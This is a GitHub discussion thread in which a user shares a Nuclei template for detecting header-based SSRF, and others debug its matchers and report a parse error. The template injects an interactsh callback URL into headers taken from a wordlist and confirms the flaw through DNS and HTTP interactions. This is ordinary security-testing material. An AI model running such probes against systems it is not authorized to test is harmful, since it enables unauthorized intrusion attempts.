-
id: ssrf-head-poc
info:
name: ssrf
author: rohit
severity: critical
tags: ssrf
requests:
- raw:
- |
GET /?cfbr=12.00 HTTP/1.1
Host: {{Hostname}}
{{header}}: {{interactsh-url}}
payloads:
header: /home/kali/tool/nu/header.txt
attack: clusterbomb
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms http Interaction
words:
- "http"
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output |
Beta Was this translation helpful? Give feedback.
Replies: 4 comments 1 reply
-
may be this tempalte not working well this template for header based ssrf |
Beta Was this translation helpful? Give feedback.
-
@rohit0x5 matchers look wrong in the above template as in includes 3rd matcher looking for attack: clusterbomb
matchers:
- type: word
part: interactsh_protocol # Confirms http Interaction
words:
- "http"
- "dns"
condition: or |
Beta Was this translation helpful? Give feedback.
-
id: ssrf-head-poc info: requests:
[WRN] Use with caution. You are responsible for your actions. line no 27 give error |
Beta Was this translation helpful? Give feedback.
-
any update |
Beta Was this translation helpful? Give feedback.
there was typo the format in last comment, below example should work.